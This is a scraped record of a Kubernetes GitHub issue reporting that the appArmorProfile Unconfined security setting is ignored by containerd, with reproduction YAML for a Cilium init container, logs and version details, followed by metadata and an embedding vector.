volumeMounts: - name: hostproc mountPath: /hostproc containers: - name: busybox image: busybox command: - sleep - "300" securityContext: appArmorProfile: type: Unconfined volumes: - name: hostproc hostPath: path: /proc type: Directory ``` dmesg on the node where the container is launched gives: `type=1400 audit(1716404572.354:231): apparmor="DENIED" operation="ptrace" profile="cri-containerd.apparmor.d" pid=1852196 comm="ls" requested_mask="read" denied_mask="read" peer="unconfined"` ### Anything else we need to know? _No response_ ### Kubernetes version <details> ```console $ kubectl version Client Version: v1.30.1 Kustomize Version: v5.0.4-0.20230601165947-6ce0bf390ce3 Server Version: v1.30.1 ``` </details> ### Cloud provider <details> Bare Metal K8s on Ubuntu 22.04 servers </details> ### OS version <details> ```console # On Linux: $ cat /etc/os-release PRETTY_NAME="Ubuntu 22.04.4 LTS" NAME="Ubuntu" VERSION_ID="22.04" VERSION="22.04.4 LTS (Jammy Jellyfish)" VERSION_CODENAME=jammy ID=ubuntu ID_LIKE=debian HOME_URL="https://www.ubuntu.com/" SUPPORT_URL="https://help.ubuntu.com/" BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/" PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy" UBUNTU_CODENAME=jammy $ uname -a # Linux k8s-master-01 5.15.0-88-generic #98-Ubuntu SMP Mon Oct 2 15:18:56 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux # On Windows: C:\> wmic os get Caption, Version, BuildNumber, OSArchitecture # paste output here ``` </details> ### Install tools <details> </details> ### Container runtime (CRI) and version (if applicable) <details> Version: 0.1.0 RuntimeName: containerd RuntimeVersion: v1.7.17 RuntimeApiVersion: v1 </details> ### Related plugins (CNI, CSI, ...) and versions (if applicable) <details> cilium-cli: v0.16.7 compiled with go1.22.2 on linux/amd64 cilium image (default): v1.15.4 cilium image (stable): v1.15.5 cilium image (running): 1.15.4 </details>
Bug: securityContext appArmorProfile unconfined not working with containerd
https://api.github.com/repos/kubernetes/kubernetes/issues/125069/comments
11
2024-05-22T19:33:32
2024-06-12T15:43:21Z
https://github.com/kubernetes/kubernetes/issues/125069
2,311,331,669
125,069
false
This is a GitHub Issue repo:kubernetes owner:kubernetes Title : Bug: securityContext appArmorProfile unconfined not working with containerd Issue date: --- start body --- ### What happened? If I define the podSecurityContext with appArmorProfile unconfined, containerd does not take it into account and use the default cri-containerd.apparmor.d profile. I don't have the problem if I use the deprecated annotations. ### What did you expect to happen? The securityContext should give the same result as the annotations. According to #123811 containerd uses both methods. ### How can we reproduce it (as minimally and precisely as possible)? This deployment works with annotations: ``` apiVersion: apps/v1 kind: Deployment metadata: name: test namespace: test spec: selector: matchLabels: mytest: test template: metadata: labels: mytest: test annotations: container.apparmor.security.beta.kubernetes.io/mount-cgroup: unconfined spec: initContainers: - name: mount-cgroup image: quay.io/cilium/cilium:v1.15.4 env: - name: CGROUP_ROOT value: /run/cilium/cgroupv2 - name: BIN_PATH value: /opt/cni/bin securityContext: appArmorProfile: type: Unconfined capabilities: add: - SYS_ADMIN - SYS_CHROOT - SYS_PTRACE drop: - ALL seLinuxOptions: level: s0 type: spc_t command: - sh - -ec - ls -la /hostproc/1/ns/cgroup volumeMounts: - name: hostproc mountPath: /hostproc containers: - name: busybox image: busybox command: - sleep - "300" securityContext: appArmorProfile: type: Unconfined volumes: - name: hostproc hostPath: path: /proc type: Directory ``` But this one doesn't. ``` apiVersion: apps/v1 kind: Deployment metadata: name: test namespace: test spec: selector: matchLabels: mytest: test template: metadata: labels: mytest: test spec: initContainers: - name: mount-cgroup image: quay.io/cilium/cilium:v1.15.4 env: - name: CGROUP_ROOT value: /run/cilium/cgroupv2 - name: BIN_PATH value: /opt/cni/bin securityContext: appArmorProfile: type: Unconfined capabilities: add: - SYS_ADMIN - SYS_CHROOT - SYS_PTRACE drop: - ALL seLinuxOptions: level: s0 type: spc_t command: - sh - -ec - ls -la /hostproc/1/ns/cgroup volumeMounts: - name: hostproc mountPath: /hostproc containers: - name: busybox image: busybox command: - sleep - "300" securityContext: appArmorProfile: type: Unconfined volumes: - name: hostproc hostPath: path: /proc type: Directory ``` dmesg on the node where the container is launched gives: `type=1400 audit(1716404572.354:231): apparmor="DENIED" operation="ptrace" profile="cri-containerd.apparmor.d" pid=1852196 comm="ls" requested_mask="read" denied_mask="read" peer="unconfined"` ### Anything else we need to know? _No response_ ### Kubernetes version <details> ```console $ kubectl version Client Version: v1.30.1 Kustomize Version: v5.0.4-0.20230601165947-6ce0bf390ce3 Server Version: v1.30.1 ``` </details> ### Cloud provider <details> Bare Metal K8s on Ubuntu 22.04 servers </details> ### OS version <details> ```console # On Linux: $ cat /etc/os-release PRETTY_NAME="Ubuntu 22.04.4 LTS" NAME="Ubuntu" VERSION_ID="22.04" VERSION="22.04.4 LTS (Jammy Jellyfish)" VERSION_CODENAME=jammy ID=ubuntu ID_LIKE=debian HOME_URL="https://www.ubuntu.com/" SUPPORT_URL="https://help.ubuntu.com/" BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/" PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy" UBUNTU_CODENAME=jammy $ uname -a # Linux k8s-master-01 5.15.0-88-generic #98-Ubuntu SMP Mon Oct 2 15:18:56 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux # On Windows: C:\> wmic os get Caption, Version, BuildNumber, OSArchitecture # paste output here ``` </details> ### Install tools <details> </details> ### Container runtime (CRI) and version (if applicable) <details> Version: 0.1.0 RuntimeName: containerd RuntimeVersion: v1.7.17 RuntimeApiVersion: v1 </details> ### Related plugins (CNI, CSI, ...) and versions (if applicable) <details> cilium-cli: v0.16.7 compiled with go1.22.2 on linux/amd64 cilium image (default): v1.15.4 cilium image (stable): v1.15.5 cilium image (running): 1.15.4 </details> --- end body ---
7,463
[ -0.017930738627910614, -0.006294408347457647, -0.009291745722293854, -0.022753121331334114, 0.008912082761526108, -0.010370787233114243, -0.032211385667324066, 0.030319733545184135, -0.013174963183701038, -0.0014229026855900884, -0.012342369183897972, -0.013015104457736015, 0.0013987574493512511, -0.0066574192605912685, 0.012375673279166222, 0.030346374958753586, -0.015626119449734688, 0.028294865041971207, -0.03506218641996384, -0.04699825122952461, 0.011742901988327503, 0.010783753357827663, 0.024604808539152145, 0.057389020919799805, 0.030079945921897888, -0.008445831015706062, -0.014094145968556404, 0.009757998399436474, 0.00229795859195292, 0.0032337938901036978, -0.002527754520997405, 0.026576390489935875, 0.010910307988524437, 0.03586147725582123, 0.06484905630350113, 0.003440277185291052, 0.015666082501411438, 0.022833049297332764, -0.027735361829400063, -0.02497781068086624, -0.06367676705121994, -0.048916544765233994, 0.009891212917864323, 0.03311724588274956, -0.0290408693253994, 0.019875677302479744, -0.018703384324908257, -0.03562168776988983, -0.029413871467113495, 0.00557171693071723, -0.008305954746901989, -0.031198952347040176, -0.006201157812029123, -0.04449380934238434, 0.007326824590563774, 0.004998892545700073, 0.03583483397960663, 0.002587701193988323, -0.013747787103056908, -0.0033103926107287407, 0.02805507741868496, 0.003876556409522891, 0.0005465977592393756, 0.0290142260491848, 0.011223363690078259, 0.014333933591842651, -0.02603020891547203, -0.002407860942184925, -0.02984015829861164, -0.027575504034757614, -0.028428079560399055, -0.018730027601122856, -0.004885660018771887, 0.008405866101384163, 0.03194495663046837, -0.03085259348154068, 0.023858806118369102, 0.019849034026265144, -0.033250462263822556, -0.008206043392419815, -0.02234015427529812, 0.014560398645699024, -0.03546183183789253, 0.007906310260295868, 0.02115454152226448, 0.02027532272040844, -0.015732690691947937, -0.05208706110715866, 0.00814609695225954, -0.01814388297498226, -0.019902320578694344, 0.004399425350129604, 0.038046203553676605, -0.03652755171060562, 0.006034639198333025, 0.00648423982784152, -0.04747782275080681, -0.014320611953735352, -0.03365010768175125, -0.004099691286683083, -0.02307283692061901, -0.040151000022888184, -0.021740686148405075, 0.003318718634545803, 0.036207836121320724, 0.0016302184667438269, 0.010983576066792011, 0.016185622662305832, 0.0145071130245924, 0.13396099209785461, -0.010517323389649391, 0.006640767678618431, -0.03263767436146736, 0.015106580220162868, -0.043934304267168045, 0.009464925155043602, -0.004988901317119598, -0.0014653649413958192, -0.039005350321531296, 0.005618342198431492, -0.003300401382148266, -0.01727798394858837, 0.009065280668437481, -0.001923291478306055, -0.029174083843827248, 0.0144937913864851, 0.002464477438479662, 0.009258441627025604, -0.04438723623752594, -0.03000001609325409, -0.00139459443744272, -0.015972478315234184, -0.004469363018870354, -0.04425401985645294, -0.003456929000094533, -0.04316165670752525, -0.030426304787397385, 0.03604797646403313, -0.0387389212846756, 0.01113677304238081, -0.017024876549839973, -0.024738024920225143, -0.03647426515817642, 0.031119022518396378, -0.01252220943570137, 0.007559950929135084, 0.013021765276789665, 0.024751346558332443, -0.0003263767284806818, -0.021714044734835625, 0.006510882638394833, -0.010843700729310513, 0.028774438425898552, 0.006294408347457647, 0.05392542853951454, -0.017038198187947273, -0.009065280668437481, -0.010850361548364162, 0.00747336121276021, -0.008365901187062263, 0.017677629366517067, -0.010210929438471794, -0.028774438425898552, -0.03583483397960663, -0.006457597017288208, 0.003530197311192751, -0.0389520637691021, 0.0144538264721632, -0.011103469878435135, 0.025590600445866585, -0.01492007914930582, -0.003540188539773226, 0.050808198750019073, 0.010850361548364162, -0.011243345215916634, -0.018876563757658005, -0.0017251342069357634, 0.02600356750190258, 0.01538633182644844, 0.011669633910059929, -0.023632340133190155, 0.02810836397111416, -0.013974253088235855, -0.003546849125996232, 0.034236252307891846, -0.034342825412750244, -0.0015760998940095305, -0.02206040360033512, 0.017850808799266815, -0.013068391010165215, 0.007886327803134918, -0.01251554861664772, 0.023898769170045853, -0.028294865041971207, -0.030186517164111137, 0.022406762465834618, 0.0020448502618819475, -0.012708710506558418, -0.0013837707228958607, -0.00263765687122941, 0.007353467866778374, -0.007546629291027784, -0.008299293927848339, -0.029653657227754593, -0.02014210633933544, -0.007206931244581938, -0.0022013778798282146, 0.0383392758667469, -0.003703376743942499, -0.04079043120145798, -0.01404086034744978, -0.013774430379271507, 0.020448502153158188, -0.008525759913027287, 0.017078163102269173, 0.01823713257908821, -0.01743784360587597, 0.008938726037740707, -0.03482240065932274, -0.024391666054725647, 0.031198952347040176, 0.002414521761238575, 0.012002671137452126, -0.008332598023116589, -0.0386323481798172, 0.013488017953932285, -0.01160302571952343, -0.04079043120145798, -0.026429854333400726, -0.026842821389436722, 0.0290142260491848, -0.02116786316037178, 0.010710485279560089, 0.05195384845137596, 0.018889885395765305, 0.015839261934161186, -0.004099691286683083, 0.009984463453292847, 0.04281529784202576, 0.04150979220867157, -0.013734465464949608, 0.030532876029610634, -0.017717594280838966, -0.0029390559066087008, -0.019569283351302147, 0.036261122673749924, 0.011296631768345833, 0.00339365191757679, 0.022633226588368416, 0.011456489562988281, -0.010763771831989288, 0.04699825122952461, 0.014587041921913624, 0.000021517344066523947, 0.012875229120254517, -0.0031238915398716927, -0.027242466807365417, -0.03285081684589386, 0.016145657747983932, 0.02126111276447773, 0.03977799788117409, 0.02227354608476162, 0.010337483137845993, 0.013920966535806656, 0.027282429859042168, -0.027282429859042168, -0.02024867944419384, 0.02512434870004654, 0.015652762725949287, -0.016598587855696678, -0.012275761924684048, -0.02986680157482624, -0.037007126957178116, -0.010011106729507446, 0.008585706353187561, 0.005005553364753723, -0.004635881632566452, 0.010930290445685387, 0.024498237296938896, -0.001969916746020317, 0.011056844145059586, -0.015839261934161186, 0.004212924279272556, -0.005821495316922665, -0.008452491834759712, 0.008592367172241211, -0.028614580631256104, -0.07396096736192703, -0.02038189396262169, -0.03253110125660896, -0.028934296220541, -0.028747795149683952, -0.03460925444960594, 0.019023101776838303, 0.0038132790941745043, 0.010936951264739037, 0.003989789169281721, 0.041882794350385666, 0.002714255591854453, 0.020914753898978233, 0.0096980519592762, -0.010976915247738361, 0.02126111276447773, 0.007127002347260714, 0.0024461604189127684, 0.03543518856167793, -0.01013100054115057, 0.02989344485104084, -0.010390769690275192, -0.004902311600744724, -0.032451171427965164, -0.03079930692911148, -0.024777987971901894, -0.011103469878435135, -0.004932285286486149, 0.011949384585022926, 0.029413871467113495, 0.010277536697685719, -0.01059059239923954, 0.00768650509417057, -0.0016260555712506175, -0.02296626567840576, -0.02400534227490425, 0.028614580631256104, 0.030559519305825233, -0.04356130212545395, -0.025830388069152832, 0.009358352981507778, -0.028428079560399055, -0.011469811201095581, -0.04169629141688347, -0.010770432651042938, -0.026429854333400726, -0.006184506230056286, -0.03591476380825043, -0.02010214328765869, -0.028587937355041504, 0.017064841464161873, 0.007786416448652744, -0.012295744381844997, -0.015039972960948944, 0.008026203140616417, -0.025590600445866585, -0.011669633910059929, 0.03194495663046837, -0.03671405091881752, 0.02214033156633377, 0.017571058124303818, 0.002889100229367614, -0.02714921534061432, 0.0009091923129744828, -0.00012207905820105225, -0.034103039652109146, -0.02701600082218647, 0.004915633238852024, -0.0096181221306324, -0.011776205152273178, -0.003640099661424756, 0.04452045261859894, -0.02607017382979393, 0.03500889986753464, -0.0677797868847847, -0.006827268283814192, 0.03929842263460159, 0.003416964551433921, 0.01753109320998192, 0.010810396634042263, 0.023938734084367752, -0.003466920228675008, -0.02228686772286892, -0.051714058965444565, -0.008405866101384163, 0.00028911817935295403, 0.03317053243517876, -0.016771767288446426, -0.028508009389042854, -0.041030216962099075, 0.011769544333219528, -0.04281529784202576, 0.01641208678483963, 0.018756670877337456, 0.012195833027362823, -0.010157642886042595, -0.02504441887140274, 0.02794850617647171, 0.04646538943052292, 0.01346137560904026, 0.04422737658023834, 0.030266446992754936, -0.04436059296131134, -0.035355258733034134, -0.01312167663127184, -0.017877452075481415, -0.04142986238002777, -0.01490675751119852, 0.006087925285100937, -0.016145657747983932, -0.03439611196517944, -0.004998892545700073, -0.03186502680182457, 0.02701600082218647, 0.01830374076962471, -0.0028957610484212637, 0.011529757641255856, 0.031438738107681274, 0.021674079820513725, -0.01745116338133812, -0.0034236253704875708, -0.01918295957148075, -0.026549749076366425, 0.0290408693253994, -0.0030173195991665125, -0.0031039093155413866, 0.028508009389042854, 0.018690064549446106, 0.028721151873469353, 0.019289530813694, 0.0008471640758216381, -0.02716253697872162, 0.04337480291724205, 0.013388106599450111, 0.007739791180938482, -0.0017317949095740914, 0.0014836819609627128, 0.014666970819234848, -0.001198934973217547, -0.006351024843752384, -0.004179620649665594, 0.02997337281703949, -0.023605696856975555, -0.010797074995934963, 0.004739123396575451, -0.020528430119156837, -0.01010435726493597, -0.013481357134878635, -0.012182511389255524, -0.021860580891370773, -0.0015694391913712025, 0.04017764329910278, -0.015013329684734344, -0.03668740764260292, 0.011463150382041931, -0.03101245127618313, 0.00040172645822167397, -0.02297958731651306, -0.03311724588274956, -0.02797514945268631, 0.015839261934161186, -0.030666092410683632, -0.014147432520985603, -0.039991140365600586, 0.03945828229188919, -0.03213145583868027, -0.030133232474327087, -0.013721144758164883, -0.009298406541347504, 0.020941397175192833, -0.004089700523763895, 0.009271763265132904, 0.02115454152226448, 0.008219365030527115, -0.0026126790326088667, -0.01657194457948208, 0.02596360258758068, 0.01841031201183796, 0.010357465595006943, -0.0145204346626997, -0.08499116450548172, 0.00817274022847414, -0.008479134179651737, 0.04915633425116539, 0.057548876851797104, 0.014160754159092903, 0.011549740098416805, -0.024404987692832947, -0.007526647299528122, 0.009564836509525776, 0.004356130491942167, -0.029200727120041847, -0.02228686772286892, 0.0076332190074026585, 0.008392544463276863, 0.0030239804182201624, -0.012135885655879974, -0.010290858335793018, -0.054431647062301636, -0.016545303165912628, 0.02686946466565132, -0.01647869497537613, -0.0026226702611893415, 0.02997337281703949, -0.0027841932605952024, -0.03455596789717674, -0.0193961039185524, 0.03178509697318077, 0.0015253117308020592, 0.04452045261859894, -0.01825045421719551, 0.04920961707830429, 0.015119901858270168, 0.005488457623869181, -0.00813277531415224, 0.017810843884944916, -0.030186517164111137, 0.02496448904275894, -0.020781539380550385, 0.00010282532457495108, 0.06847250461578369, -0.012941836379468441, 0.024724703282117844, -0.02324601635336876, -0.0020381894428282976, 0.011769544333219528, -0.023725589737296104, 0.016705160960555077, -0.0027275769971311092, 0.014627005904912949, -0.006434284150600433, 0.010923629626631737, 0.03090587817132473, -0.027628790587186813, -0.035355258733034134, 0.006980465725064278, 0.002670960733667016, -0.01643873006105423, -0.02800179086625576, 0.04526645317673683, -0.002414521761238575, 0.01539965346455574, -0.021887224167585373, -0.00702043017372489, -0.0003852827358059585, -0.0007909640553407371, 0.02020871452987194, -0.004775757435709238, -0.014174075797200203, 0.013801073655486107, -0.013015104457736015, -0.016878340393304825, 0.00007691084465477616, -0.00827931147068739, 0.032211385667324066, -0.03095916472375393, 0.0022013778798282146, -0.005441832356154919, 0.02714921534061432, -0.028934296220541, 0.012182511389255524, -0.034262895584106445, -0.0011264992645010352, -0.0029040868394076824, 0.012728692963719368, 0.012448941357433796, 0.017757559195160866, -0.019023101776838303, 0.0067972950637340546, 0.05206041783094406, 0.024404987692832947, -0.004093030467629433, -0.01833038404583931, -0.007120341528207064, 0.0004974747425876558, -0.000023494754714192823, -0.028294865041971207, -0.005185393616557121, -0.01497336570173502, 0.018010666593909264, -0.02204708196222782, 0.020621681585907936, 0.01635880209505558, 0.0145071130245924, -0.01837034709751606, -0.004689167719334364, 0.005914745852351189, -0.02696271426975727, 0.048916544765233994, 0.010404091328382492, -0.02026200108230114, -0.013801073655486107, 0.013974253088235855, -0.009384996257722378, 0.010530645027756691, -0.01497336570173502, -0.015692725777626038, 0.023952055722475052, -0.015266438014805317, -0.0033869913313537836, -0.0024994462728500366, -0.029413871467113495, -0.007180287968367338, 0.021927187219262123, 0.017544414848089218, 0.006207818631082773, -0.0012780313845723867, 0.022553298622369766, -0.03679398074746132, 0.004515988286584616, 0.01356794685125351, 0.002855796366930008, 0.001996559789404273, -0.005225358065217733, 0.007559950929135084, 0.012375673279166222, -0.023778876289725304, 0.008698939345777035, 0.042122580111026764, 0.0016893326537683606, 0.00649756146594882, -0.012895211577415466, -0.0021347703877836466, -0.009005333296954632, 0.011389882303774357, -0.0023562402930110693, -0.008952047675848007, -0.005038856994360685, 0.036154549568891525, 0.03937835246324539, -0.030559519305825233, 0.013474696315824986, 0.015746012330055237, 0.007639879826456308, -0.03173181042075157, 0.007346807047724724, -0.013181624002754688, 0.022766442969441414, -0.02030196599662304, 0.022939622402191162, -0.0072402348741889, -0.001826710649766028, -0.004222915507853031, -0.003358683083206415, -0.021447613835334778, -0.026389889419078827, -0.009991124272346497, -0.03202488273382187, 0.015492903999984264, 0.005058839451521635, -0.018876563757658005, -0.021953830495476723, -0.04036414250731468, 0.0029107476584613323, -0.025590600445866585, -0.007293520960956812, 0.04305508732795715, -0.028428079560399055, 0.01404086034744978, -0.02504441887140274, -0.008805511519312859, 0.006201157812029123, 0.003436946775764227, -0.0065674991346895695, -0.012781978584825993, -0.031412094831466675, 0.03402310982346535, -0.0004454376467037946, 0.017091482877731323, 0.030719377100467682, 0.06005331873893738, -0.018743349239230156, 0.004123004153370857, -0.02607017382979393, -0.032317958772182465, -0.01815720461308956, -0.02997337281703949, 0.01725134253501892, 0.021580828353762627, -0.0193961039185524, -0.004322826396673918, -0.030612805858254433, 0.03375668078660965, 0.015546189621090889, -0.004988901317119598, -0.013321499340236187, -0.011289970949292183, -0.013068391010165215, -0.01749112829566002, 0.0019432737026363611, 0.008265990763902664, -0.011716258712112904, -0.00017411615408491343, -0.02203376032412052, 0.008665635250508785, -0.025284206494688988, 0.03594140708446503, 0.0031938294414430857, 0.02120782621204853, -0.026816178113222122, 0.006953822914510965, 0.03362346440553665, -0.017797524109482765, 0.00242451298981905, -0.016865018755197525, 0.025750458240509033, -0.01210924331098795, 0.000803869217634201, -0.012728692963719368, 0.01299512293189764, 0.018063953146338463, -0.01730462722480297, 0.012149207293987274, 0.0008592366939410567, 0.015932513400912285, -0.00015850503405090421, 0.005525091663002968, -0.01642540842294693, -0.026389889419078827, 0.006714035756886005, 0.005631663836538792, 0.010457376949489117, 0.03370339423418045, -0.018503563478589058, -0.038206059485673904, -0.016132336109876633, 0.038579061627388, 0.028508009389042854, 0.014826828613877296, -0.015706047415733337, 0.010404091328382492, -0.012302404269576073, 0.013654536567628384, 0.0029007564298808575, 0.005891432985663414, -0.011116791516542435, -0.025310849770903587, -0.02014210633933544, 0.001690997858531773, -0.008026203140616417, -0.026269996538758278, 0.0022679853718727827, 0.0065641687251627445, -0.021900545805692673, -0.023459160700440407, 0.04460037872195244, 0.004329487215727568, -0.03002665936946869, -0.006227801088243723, 0.033197175711393356, -0.007653201464563608, 0.01625222899019718, -0.007806398440152407, -0.013128337450325489, 0.0014970034826546907, 0.02027532272040844, -0.016665196046233177, -0.0015369680477306247, -0.00009429123747395352, 0.005391876678913832, -0.008532420732080936, -0.03386325016617775, 0.008099471218883991, 0.033357035368680954, -0.00458925636485219, -0.01633215881884098, -0.02110125496983528, -0.0041063521057367325, 0.006357685662806034, -0.00746003957465291, -0.016079049557447433, -0.007286860141903162, -0.006301069166511297, 0.010470698587596416, -0.01650533825159073, 0.007100359071046114, -0.003480241633951664, 0.029706943780183792, -0.006407641340047121, 0.025350812822580338, -0.03769984468817711, -0.002344583859667182, 0.0023562402930110693, 0.02317940816283226, 0.014560398645699024, -0.011329934932291508, -0.03295738995075226, 0.013607911765575409, -0.02204708196222782, -0.046012457460165024, -0.019129673019051552, 0.004545961506664753, 0.03927177935838699, -0.026536427438259125, -0.01148313283920288, -0.023432517424225807, 0.01753109320998192, -0.012282422743737698, -0.001996559789404273, 0.014733578078448772, -0.008645652793347836, 0.025484029203653336, 0.013827716000378132, -0.044040877372026443, -0.004489345476031303, 0.05882774293422699, -0.031198952347040176, 0.04156307876110077, -0.011802848428487778, -0.03761991485953331, -0.0002587284834589809, 0.003759993240237236, -0.025523992255330086, -0.013881002552807331, -0.009791302494704723, -0.007759773172438145, 0.021647436544299126, -0.0008567389450035989, -0.03354353457689285, 0.0003347026649862528, -0.008592367172241211, -0.022606585174798965, 0.010024428367614746, -0.00627109594643116, 0.035355258733034134, 0.0003230463480576873, 0.037166982889175415, 0.006933840457350016, -0.041056860238313675, 0.02219361811876297, 0.01297514047473669, -0.006694053299725056, 0.008685617707669735, 0.01833038404583931, 0.008219365030527115, -0.011849474161863327, -0.0096714086830616, 0.003590143984183669, 0.01735791377723217, -0.006231131497770548, -0.001716808183118701, 0.010310840792953968, -0.00966474786400795, -0.014826828613877296, -0.009278424084186554, -0.01113677304238081, -0.019689176231622696, -0.04238901287317276, 0.03383660688996315, 0.027762005105614662, 0.01633215881884098, -0.011323274113237858, 0.04643874615430832, 0.012815282680094242, -0.008712260983884335, -0.0019849033560603857, -0.022952944040298462, 0.023405874148011208, -0.01115009468048811, -0.03458261117339134, -0.015772655606269836, -0.024671416729688644, -0.0016593593172729015, 0.024658095091581345, -0.013694501481950283, -0.0024178521707654, 0.029147440567612648, -0.01250888779759407, -0.004735792987048626, -0.009045298211276531, -0.02505774050951004, -0.006440944969654083, -0.008252669125795364, 0.02616342529654503, 0.007386771496385336, 0.01823713257908821, -0.020768217742443085, 0.010903647169470787, -0.006464257370680571, 0.0022013778798282146, -0.014134110882878304, 0.01296181883662939, 0.014134110882878304, -0.0007892988505773246, -0.027215823531150818, -0.015932513400912285, 0.004905642010271549, -0.02524424158036709, 0.00385324377566576, 0.03199824318289757, -0.01400089543312788, -0.015119901858270168, 0.006487570237368345, -0.019849034026265144, 0.018809957429766655, 0.004069718066602945, -0.010004445910453796, 0.04071050137281418, -0.00504218740388751, 0.016225585713982582, 0.014706935733556747, -0.003606796031817794, -0.032344602048397064, -0.001305506913922727, -0.012335708364844322, 0.0021081273443996906, 0.00013321499864105135, -0.0015269768191501498, 0.005851468537002802, -0.018543526530265808, -0.024538202211260796, -0.03932506591081619, -0.020661646500229836, -0.004096360877156258, 0.0027175857685506344, 0.0035168759059160948, -0.00035718269646167755, -0.015026651322841644, -0.00965142622590065, 0.00724689569324255, 0.007759773172438145, 0.004505997058004141, 0.003215476870536804, 0.028667867183685303, -0.01356128603219986, 0.0041996026411652565, 0.01343473233282566, -0.020941397175192833, 0.02130107767879963, -0.051554203033447266, 0.004998892545700073, 0.012388993985950947, 0.04246893897652626, 0.020475145429372787, 0.019915642216801643, -0.02323269471526146, 0.01401421707123518, -0.003105574520304799, -0.012275761924684048, 0.0012214150046929717, -0.002541075926274061, -0.015199830755591393, 0.002141430974006653, 0.023872127756476402, -0.0041030216962099075, -0.023845484480261803, 0.009411639533936977, 0.016079049557447433, -0.009458264335989952, -0.04073714464902878, 0.021647436544299126, -0.0005303621874190867, -0.054564859718084335, -0.04915633425116539, 0.009131887927651405, 0.01815720461308956, -0.041909437626600266, 0.013361464254558086, 0.0480906143784523, 0.03370339423418045, 0.014560398645699024, -0.02624335326254368, 0.007986239157617092, -0.00029015890322625637, -0.029573729261755943, 0.026736250147223473, -0.0025160980876535177, 0.004023092798888683, -0.010643878020346165, -0.028294865041971207, 0.020581716671586037, 0.03343696519732475, 0.0065674991346895695, -0.008212704211473465, 0.003018984803929925, 0.0032604369334876537, -0.004559283144772053, 0.013334820978343487, 0.007912971079349518, 0.008985351771116257, 0.014227361418306828, 0.03255774453282356, 0.003899869043380022, -0.003610126441344619, -0.004852356389164925, 0.0240985918790102, 0.005608351435512304, -0.00744671793654561, 0.005611681845039129, 0.015759333968162537, -0.02223358303308487, 0.002832483733072877, 0.0034735810477286577, -0.0025294197257608175, -0.010637217201292515, 0.03559504821896553, -0.00312888715416193, 0.012608799152076244, -0.0192762091755867, 0.008239347487688065, 0.03562168776988983, -0.008372562006115913, -0.013414749875664711, 0.014107467606663704, 0.008692278526723385, 0.006027978379279375, -0.04031085595488548, 0.0022213601041585207, -0.02405862882733345, 0.011110130697488785, 0.001673513324931264, -0.021807294338941574, -0.033090606331825256, -0.0388721339404583, 0.0055051096715033054, 0.024338379502296448, 0.02226022630929947, 0.003606796031817794, 0.021687401458621025, 0.011682954616844654, -0.014067503623664379, -0.013947609812021255, -0.03178509697318077, -0.005791522096842527, -0.03202488273382187, 0.013667858205735683, -0.004039744846522808, -0.021540865302085876, 0.011822830885648727, 0.031278882175683975, -0.02024867944419384, -0.006720696575939655, 0.013787752017378807, -0.010523984208703041, 0.011369899846613407, 0.003946494311094284, 0.009964481927454472, 0.011443167924880981, 0.023632340133190155, -0.009371674619615078, -0.0024494905956089497, -0.004689167719334364, 0.003440277185291052, -0.005668297875672579, -0.01642540842294693, 0.016158979386091232, 0.002324601635336876, 0.011976027861237526, -0.018863243982195854, -0.004396094940602779, -0.022713156417012215, -0.008046185597777367, 0.005918076261878014, 0.04180286452174187, 0.035195402801036835, -0.031198952347040176, -0.028321508318185806, 0.0016435399884358048, 0.016718482598662376, 0.023579053580760956, 0.0120759392157197, -0.016705160960555077, -0.02986680157482624, 0.00048373694880865514, -0.014533756300807, 0.03583483397960663, -0.034262895584106445, 0.018077274784445763, -0.01355462521314621, -0.0035435189493000507, -0.0005657474393956363, -0.006007996387779713, 0.013641214929521084, 0.002684282138943672, 0.021021325141191483, -0.0020082159899175167, -0.009251781739294529, -0.002494450658559799, -0.022460047155618668, 0.005568386521190405, 0.013974253088235855, 0.01719805598258972, 0.008672296069562435, 0.007513325661420822, 0.029227370396256447, -0.007619897834956646, -0.03660748153924942, 0.0382859893143177, -0.025257563218474388, 0.005858129356056452, -0.012941836379468441, -0.0011364903766661882, -0.006407641340047121, -0.027282429859042168, 0.025763779878616333, -0.0009941168827936053, 0.003696716157719493, -0.06154532730579376, -0.027682075276970863, -0.017917416989803314, 0.011103469878435135, -0.031092379242181778, -0.009911195375025272, -0.014840150251984596, 0.003045627847313881, 0.0007102024392224848, -0.024604808539152145, -0.0144538264721632, -0.020688287913799286, -0.002086479915305972, 0.06175846979022026, 0.012835265137255192, 0.025777101516723633, -0.0009316723444499075, -0.018650099635124207, -0.0004862347268499434, 0.024351701140403748, 0.00006291286263149232, 0.012362351641058922, -0.018943171948194504, 0.018570169806480408, -0.010717146098613739, 0.002257994143292308, 0.01916963793337345, 0.003939833492040634, 0.032344602048397064, -0.018170524388551712, -0.008778868243098259, -0.0027525548357516527, -0.010051071643829346, -0.003460259409621358, 0.0033753348980098963, -0.005388546735048294, 0.004928954876959324, -0.013508000411093235, 0.008106132037937641, -0.004898981191217899, -0.0017451164312660694, -0.0034302861895412207, 0.003759993240237236, 0.008039524778723717, -0.027575504034757614, -0.020754896104335785, -0.0386589914560318, 0.01919628120958805, -0.0025360805448144674, 0.00175344233866781, -0.016678517684340477, 0.014640327543020248, -0.017784202471375465, 0.01300178375095129, 0.004126334562897682, 0.0011073496425524354, 0.044786881655454636, -0.01296847965568304, -0.03285081684589386, -0.011110130697488785, 0.008658974431455135, -0.035142116248607635, 0.0014820167561993003, -0.0241652000695467, -0.020648324862122536, -0.033090606331825256, 0.034076396375894547, -0.012768656946718693, 0.015213152393698692, 0.013408089056611061, 0.01750444993376732, -0.015239795669913292, -0.020075500011444092, 0.009571497328579426, -0.012295744381844997, -0.011982688680291176, -0.003556840354576707, 0.015026651322841644, 0.016838375478982925, -0.029706943780183792, 0.003583483397960663, 0.003253776114434004, 0.003225468099117279, 0.032451171427965164, 0.005948049481958151, 0.004003110341727734, -0.013408089056611061, 0.008672296069562435, 0.016798410564661026, -0.007972917519509792, -0.004729132167994976, -0.017690951004624367, -0.014333933591842651, 0.01727798394858837, 0.01847692020237446, -0.0054085287265479565, 0.008485794998705387, -0.015013329684734344, 0.02220693975687027, -0.031092379242181778, -0.016172301024198532, 0.006390989292412996, -0.010743789374828339, -0.00580484326928854, 0.026802856475114822, 0.004922294057905674, 0.008958708494901657, 0.01838366873562336, 0.013348142616450787, -0.015026651322841644, -0.008485794998705387, 